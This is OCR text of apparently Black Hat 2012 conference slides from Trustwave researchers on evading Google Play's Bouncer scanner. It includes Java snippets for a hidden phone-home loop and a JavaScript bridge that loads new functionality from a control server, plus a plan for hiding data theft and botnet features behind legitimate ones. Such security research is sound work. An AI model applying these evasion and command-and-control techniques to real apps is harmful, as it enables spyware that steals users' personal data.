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• Started InfoSec Career in the 1990s 

• Formed SpiderLabs at Trustwave in 2005 

• 3'^'^ talk at Black Hat, DBF CON (6 times), Briefings for 
DHS, US-CERT, and United State Secret Service 

• Research areas include Data Breaches, Malware, and 
Mobile Computing 

• Primary Author of the annual Trustwave Global 
Security Report 

• @c7ive on Twitter 
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Introductions-About Sean . 
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Backend SSL services developer at Trustwave 
Writes mobile apps and video games 
Performs malware analysis on Android 

Discovered design flaw in Android 
- Presented at DEF CON 19 

@sirsean on Twitter 
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Mobile Malware rarely make an appearance 

- Security Researchers, yes. 

- General Public, no. 

Consumer Devices 

- Lacks good built-in activity visibility 

Targeted attacks are happening 
Wide-spread catastrophes around the corner 
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• Targeted Mobile Attacks Exist 

- Never make media reports 

- How many go undetected? 

• Android and iOS malware gets personal 

- Pinpoints: 

• Where you are? 

• What you are doing? 

• Record your activities - digital and physical worlds 
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Top of Mind is APP SALES! 

- These are major revenue generators! 

Everyone's dying to get into Apple's App Store 

- They can make the barrier very high 


• Google Android developers can publish easily 

- This was motivated by business, not security. 

- Created a major problem for Google 

- "Bouncer" was their answer... 
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• Google is one of the largest tech companies 

• The best search technology 

• Crazy future-creating research projects 

• 800,000 Android devices activated EVERY DAY 

• Android gets them $1.70 per device per year^ 

• Estimated $400 Million in 2011^ 


1 - Horace Dediu's analysis (http://www.asymco.eom/2012/04/02/android-economics) 
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Our Motivations-^active Markejs^ 

Historically mobile markets were reactive 
The world finds all types of mobile malware 

- Mostly Zeus, SpyEye, and SMS hijack variants 
Low barriers of entry, make a criminal happy 
Results: Lots of malware, no one detecting it 
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Qur Motivations - Bouncer Rauealed 
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Reactive approach is a losing battle 

- Criminals can create malware faster than people will 
ever detect and report it 

Google came to the same conclusion 

— Funded "Bouncer" with some of that $400M 


Formally announced on February 2"^, 2012^ 


2 - http://googlemobile.blogspot.eom/2012/02/android-and-security.html 
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0ur Motivations - Curious, we are. 
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In the age of "Bouncer": 

- How difficult would it be to slip some malware 
past him? 

- How long could we perform research before 
getting caught? 

The results would benefit all app market 
owners, not just Google. 

Thus, began our Adventures in Bouncerland! 

Q 

black 

U5A 2012 













V\Ahat We Knew About ''Bouncer'' 

I * • . ^ J ■_■ -I ■ '■ L ■' _■» I ^ 

• • V ^ ^ 

• Before February 2"*^, 2012 only Google knew 
"Bouncer" existed 

• We learned from Google^: 

- It's automated. 

- Scans new and old 

- Stops known malware immediately 

- Behavior based 

— Runs in Google's Cloud, simulates Android runtime 

- Looks for "hidden, malicious" behavior 

3 - http://googlemobile.blogspot.eom/2012/02/android-and-security.html 
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What We Knew About ''Bouncer'' 


• "Bouncer's" description sounded scary 

• Lot of hurdles to overcome to be a successful 
malware developer for Android now 

• We expected to fail - hard. 
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All of our previous Android research was 
lab based 

Testing "Bouncer" would mean utilizing 
Google's resources 

We needed to establish rules to avoid 
problems 
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• We will not attempt to obtain access to 
Google's infrastructure beyond what is 
already supplied during the normal 
application review process. 

- Rooting and Remote Shells is prohibited. 

— This would be irresponsible and likely illegal. 


Q 

black 



• We would put controls in place that would 
reduce the chance of an end-user 
downloading malware we placed within the 
marketplace and that it would not execute if 
downloaded. 

- We paid very close attention to this every step of 
the way. 
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R^earch Approach & Process - Goals 

• Established a legitimate Android developer 
account 

• Test the bounds of "Bouncer" malware detection 
- Using only legitimate tools provided in the SDK 

• Look for ways to hide malicious functionality 


• Record our results to help improve how this is 
being done 
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-.Pha^ P - Build a Benign App,, 

Developed a fully functional benign app 

The application was one that is very common 

- One of the factors to mitigate the chance of 
someone else downloading it 

We did not trust that "Bouncer" was fully 
automated 

- A sloppy "test" app would stand out quickly 
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Meet "SMS Bloxor" 

i 


Sf/lS SMS Bloxor 


^ SHD® 2:13pm 


I Add To Blacklist 


123 - 555-0001 


6li>ck BNV SMS Number 
No Corrier F«cs 

Simpte BJock / Unlock Feot^ires 




1 

2 ABC 

3 DEF 

I 

4 GHI 

5 JKL 

I 

6 MNO 

I 

7 PQRS 

8 TUV 

9 WXYZ 

I 

DEL 

<Z] 


* # ( 0 + 
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It's a SMS Blocker! 


Done 


Phase O' 

I r . - - 


■ "SMS Bloxor" Phone Home 



We needed to know if our app was being 
scanned by "Bouncer" 


"Bouncer" might allow apps to access the 
Internet 


We added a simple BroadcastReceiver. 
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"SMS Bloxor" Phone Home 
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<receiver android: nam.e= receiver. CommunicationReceiver" /> 

In our BroadcastReceiver, we schedule it to run itself again in the future using a 
Pendingintent and the Alarm Manager. 

Intent alarmintent = new Intent(context, 

CommunicationReceiver. class) ; 

Pendingintent pendingintent = 

Pendingintent.getBroadcast(context, 0, alarmintent, 
Pendingintent. FLAG_UPDATE_CURRENT) ; 

AlarmManager alarmManager = 

(AlarmManager)context.getSystemService {Context.ALARM_SERVICE) ; 

alarmManager.set(AlarmManager. RTC_WAKEUP, nextTime(), 
pendingintent) ; 
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Phase 0^- "SMS Bloxor" Phone Home 

l' ^ ' • . ' ^ 

' ' •' ”” ' ' ' = - 

It will phone home even when it is asleep 

Will NOT appear in the list of "currently 
running apps" 

In this phase, our backend server is just 
recording IP and basic information with the 
request. 
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"SMS Bloxor" Benign Demo 


S/VlS SMS Bloxor 


aiodt ANV SMS Numb«f 
No Additioool Corrior Foos 
Simple Block / Unblock Feobires 



SHD® 2:13pm 

Add To Blacklist 

rnmmmmmmrnm 

123-555-0001 





' 1 '! 2 ABC ■' 3 DEF 

__l_ 

1_ i 

4 GHI ! 5 JKL 

6 MNO 

7 PQRS 

8 TUV 

9 WXYZ 
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Done 
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Creating a Google Android Developer account 
is quick and painless. 

Selling apps takes an additional step of linking 
in an active Google Checkout (merchant) 
account. 

Total effort took less than 60 minutes! 


Your Registntion to the Android M^nret is approved! 

You can now upload and publish software to the Android Market. 
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• We then populated all the required fields and 
uploaded our APK file. 


Active 


HHH VersionCode; 1 

API level; 7-16+ 

VersionName: 1.0 

Supported screens; small-xiarge 

Size; 27k 

Localized to; default 

Permissions; 

OpenGL textures; all 

android.permission.RECEIVE_BOOT_COMPLETED, 

android.permission.INTERNET, 
android.permission.RECEIVE_SMS, 
android.permission.READ_CONTACTS 
Features; android.hardware.telephony, 
android.hardware.touchscreen 
«less 
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We wanted to mitigate the chance of an end 
user downloading our app. 

Most other "SMS Blockers" are either free or 
less than $2.00. 

We priced ours at $49.95 


All Android Market listings 






SMSBIoxorl.O 

Applications: Communication 
In-aoD Products 

Comments 

0 total installs (users) 

0 active installs (devices) 

$49.95 

Errors 

V Published 
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Phase 0 - "Bou ncer" Appears. 


Within a few minutes, our back end control system 
received a web request: 



We now know more about "Bouncer": 

- He scans upon publishing and likely automated. 

- The IP belonged to Google. 

- "Bouncer" wants everyone to think he is an actual 
device, not an emulator. 
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phase 0 - Let's Try That Again. 


Never build off of a single test. 

We waited a day and published version 1.0.1 
"Bouncer" scanned us again. 



• Different IP, but same network block. 
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"SMS Bloxor" in the Market 


^ Android Market 


Apps ▼ Music ▼ Books ▼ Movies ▼ My Library ▼ 


Search 


> > 


SMS Bloxor 


StAS 





Description 


Easily block any SMS number from reaching your phone. 

This application allow you to easily block any SMS number from reaching your phone. 


TT 0 

^ Tweet 

ABOUT THIS APP 
RATING: 


Visit Developer's Website Email Developer > 


App Screenshots 




Add T« BtodllH 

SMSItcior 


123-Sfi&4)M>1 



1 2 3 


4 5 6 ^ . 


7 pons 8 9 rrz ^ 


* • ( 0 ♦ ^ 



UPDATED: 

March 6.2012 

CURRENT VERSION: 
1 . 0.1 

REQUIRES ANDROID: 
2.1 and up 

CATEGORY: 

Communicatioo 

SIZE; 

26k 

PRICE: 

$49.05 

CONTENT RATING: 
Everyone 
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We knew where "Bouncer" lived. 


• We made "SMS Bloxor" have two modes: 

- If run within Google, don't execute maliciously. 

- If run outside* of Google, run maliciously. 

* We defined "outside" as within Trustwave's network for this 
research. 
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We also wanted to avoid manual review 
detection. 

— Having both malicious and non-malicious functionality in 
the app would certainly sound alarms during code review. 


We turned to a legitimate technique allowed 
by Google for a solution. 


Q 

black 

U5A 2012 



Facebook's app lives inside a "native wrapper". 

This allows the app to live along side all the other 
Android apps. 

It also allows Facebook to update the HTML and 
Javascript functionality without having to update 
the app. 

Facebook's app can dynamically enable OS-level 
functionality through Android's Javascript bridge. 
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Facebook's app can dynamically enable OS- 
level functionality through Android's 
Javascript bridge. 


This means ANY app that is using Android's 
Javascript bridge could become malware at 
any time after the review process. 
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• If it works for Facebook, if II work for us: 

WebView webView = new WebView(context); 

webView.getSettings().setJavaScriptEnabled(true); 

webView.addJavascriptInterface(bridge, "Bridge"); 

webView.loadData(RawFileReader.readFile(webView.getC 
ontextO, R. raw. default js), "text/html" , "UTF-8"); 


• When we need to load new functionality: 

webView.postUrl(API ENDPOINT, postData(bridge)); 
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Avoiding detection was our goal! 


We always included legitimate functionality 
within "SMS Bloxor" that mirrored the malicious 
functionality we wanted. 


We could also now turn our control server in a 
Command & Control (C&C) server via Javascript 
bridge. 



"SMS Bloxor" Phases 1 - 7 


Phase 

Version 

Legit 

Malware 

Scan 

Detect 

1 

1.1 

Select block numbers 
from contacts 

Steal all contacts 

Yes 

No 

2 

1.2 

Select block numbers 
from SMS history 

Steal all SMS records 

Yes 

No 

3 

1.3 

See your own phone 
number 

Complete phone 

recon 

No 

No 

4 

1.4 

Select photos to associate 
with blocked numbers 

Steal all photos on 
device 

Yes 

No 

5 

1.5 

Select block numbers 
from phone history 

Steal all phone 
records 

Yes 

No 

6 

1.6 

Added advertisements 

Hijack users screen 

Yes 

No 

7 

1.7 

Add analytics 

DDoS any website 

Yes 

No 
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SMS Bloxor" Command & Control 


SMS Bloxor Home 


Phone Recon 


Blacklist 


Contacts 


Phone Records 


SMS Records 


Photos 


Hijack 


Botnet 


Recent 


IP 

Phone 

Visited at 

Contacts 

SMS 

Recon 

Photo 

Phone Records 

127.0.0.1 


2012-07-05 15:43:18 -0500 






127.0.0.1 


2012-07-05 15:21:53 -0500 






127.0.0.1 


2012-07-05 15:15:16 -0500 






127.0.0.1 


2012-07-05 15:15:03 -0500 






127.0.0.1 


2012-07-05 15:14:59 -0500 






127.0.0.1 


2012-07-05 15:14:52 -0500 






127.0.0.1 


2012-07-05 14:50:34 -0500 






127.0.0.1 


2012-07-05 14:50:34 -0500 






127.00.1 


2012-07-a5 14:.5n:33 -aSOO _ 
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yFinal Tes t - Let^s Get Caught. ^ 

We were successful at creating a "mobile info¬ 
stealing botnet" and getting it published 
without detection. 


We turned off the IP block and submitted 
another version. 

- We still did not get caught. 
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-fincH Test - Let^s Get Caught. 
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Changed interval from 15 minutes to 1 second 


We angered "Bouncer" 


He scanned us 19 times within 6 minutes 


But we did get data back... 
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yFinal Tes t - Let^s Get Caught. 

• Contacts: 412-722-5225 & 202-456-1111 

• Phone Number: 15555215877 

• Voicemail: 15552175049 

• ANDROIDJD: 9774d56cl682e549c 

• Device ID: 112358132134559 

• Subscriber ID: 310260509066168 

• SIM Serial Number: 89014103211118510720 
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,Fin^ TestGet Caught 

And we also received this: 


Subject: Notification of Google Play Developer Account Suspension 
From: Google Play Support (googleplay-developer-support^google com) 

To: 

Date: Thursday, May 3. 2012 11:50 AM 

This is a notification that your Google Play Publisher account has been terminated. 

RE.4S()N FOR TERMINATION: Violations of the Content Policy and Developer Distribution 
Agreement 

Please note that Google Play Publisher terminations arc associated with developers, and may span 
multiple account registrations and related Google services. If you feel we have made an error, you can 
visit the Google Play Help Center article for additional information regarding this termination. 

Please do not attempt to register a new' developer account. We will not be restoring your account at this 
time. 
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The Google Play Team 



"SMS Bloxor" Evil Demo 


Sf/lS SMS Bloxor 


Steals your contacts 

Uploads your SMS history 

Fingerprints your device 

Grabs all your photos 

Uploads your call records 

Hijacks your screen 

Makes your device part of a botnet 


^ SRD® 2:13pm 


Add To Blacklist 


123 - 555-0001 




1 - 

1 

r -1 

2 ABC 

3 DEF 

r -' 

f -' 

4 ghi 

i 1 

5 JKL 

i ■ 

6 MNO 

/-1 

7 PQRS 

i -1 

8 TUV 

9 WXYZ 

' DEL 

cn 

1-' 

* # ( 

0 + 

-1 

f -' 

Done 
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What \Ne Learned j^'Bouncer" Flaws 

» u 1 \ * 

Everything Google said about "Bouncer" was 
true. 

If s main weakness is that developers can easily 
determine when their app are being run by it. 

Android also allows any developer to bypass this 
process via a Javascript bridge. 
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What We Learned - A Better "Bouncer" 
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A better "Bouncer" would consist of other entry 
and end-point evaluations. 

"Bouncer" would run the apps for longer than a 
few minutes to verify functionality. 

Developers would be required to submit 
functionality maps with their APKs. 

End-users would receive these maps with each 
download and their devices would prevent 
actions outside of those maps. 

Javascript bridges must be strictly limited. 
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Conclusions 





• These issues are going to affect both public and 
private markets being used today and developed 
for tomorrow. 


• Application markets with malware detection can 
easily be bypassed. 

— Both automated and manual reviews 

• Unless malware detection is built-in to the OS, 
developers will always find ways to bypass pre¬ 
entry detection. 
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Please make sure you fill out 
the Black Hat Evaluation Form! 









